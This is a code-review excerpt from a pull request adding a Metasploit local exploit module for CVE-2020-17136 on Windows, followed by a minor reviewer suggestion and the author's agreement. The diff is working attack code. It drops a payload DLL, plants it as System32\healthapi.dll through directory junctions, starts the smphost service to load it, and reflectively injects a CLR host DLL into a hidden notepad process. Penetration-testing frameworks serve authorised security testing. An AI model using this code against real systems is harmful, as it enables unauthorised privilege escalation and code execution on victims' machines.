modules/exploits/windows/local/cve_2020_17136.rb

```diff
@@ -0,0 +1,323 @@
+    if installed_dotnet_versions == []
+      fail_with(Failure::BadConfig, 'Target has no .NET framework installed')
+    end
+    rclr = find_required_clr(exe_path)
+    if check_requirements(rclr, installed_dotnet_versions) == false
+      fail_with(Failure::BadConfig, 'CLR required for assembly not installed')
+    end
+    payload_path = "C:\\Windows\\Temp\\#{rand_text_alpha(16)}.dll"
+    print_status("Dropping payload dll at #{payload_path} and registering it for cleanup...")
+    write_file(payload_path, generate_payload_dll)
+    datastore['ARGUMENTS'] = "#{dir_junct_path}\\#{intermediate_dir} #{junction_dir}\\Windows\\System32\\healthapi.dll #{payload_path}"
+    register_file_for_cleanup(payload_path)
+    execute_assembly(exe_path)
+    cmd_exec('net start smphost')
+    register_file_for_cleanup('C:\\Windows\\System32\\healthapi.dll')
+  end
+
+  def pid_exists(pid)
+    mypid = client.sys.process.getpid.to_i
+
+    if pid == mypid
+      print_bad('Cannot select the current process as the injection target')
+      return false
+    end
+
+    host_processes = client.sys.process.get_processes
+    if host_processes.empty?
+      print_bad('No running processes found on the target host.')
+      return false
+    end
+
+    theprocess = host_processes.find { |x| x['pid'] == pid }
+
+    !theprocess.nil?
+  end
+
+  def launch_process
+    process_name = 'notepad.exe'
+    print_status("Launching #{process_name} to host CLR...")
+
+    process = client.sys.process.execute(process_name, nil, {
+      'Channelized' => true,
+      'Hidden' => true,
+      'UseThreadToken' => true,
+      'ParentPid' => 0
+    })
+    hprocess = client.sys.process.open(process.pid, PROCESS_ALL_ACCESS)
+    print_good("Process #{hprocess.pid} launched.")
+    [process, hprocess]
+  end
+
+  def inject_hostclr_dll(process)
+    print_status("Reflectively injecting the Host DLL into #{process.pid}..")
+
+    library_path = ::File.join(Msf::Config.data_directory, 'post', 'execute-dotnet-assembly', 'HostingCLRx64.dll')
+    library_path = ::File.expand_path(library_path)
+
+    print_status("Injecting Host into #{process.pid}...")
+    exploit_mem, offset = inject_dll_into_process(process, library_path)
+    [exploit_mem, offset]
+  end
+
+  def execute_assembly(exe_path)
+    if sysinfo.nil?
+      fail_with(Failure::BadConfig, 'Session invalid')
+    else
+      print_status("Running module against #{sysinfo['Computer']}")
+    end
+    if datastore['WAIT'].zero?
+      print_warning('Output unavailable as wait time is 0')
+    end
+
+    process, hprocess = launch_process
+    exploit_mem, offset = inject_hostclr_dll(hprocess)
+
+    assembly_mem = copy_assembly(exe_path, hprocess)
+
+    print_status('Executing...')
+    hprocess.thread.create(exploit_mem + offset, assembly_mem)
+
+    sleep(datastore['WAIT']) if datastore['WAIT'].positive?
+
+    if datastore['WAIT'].positive?
+      read_output(process)
+    end
```

Comment:
Just a minor suggestion here so `WAIT` is only checked once.

```suggestion
    if datastore['WAIT'].positive?
      sleep(datastore['WAIT'])
      read_output(process)
    end
```

Reply:
Yep agreed this looks a lot better, I'll go ahead and make this change so long.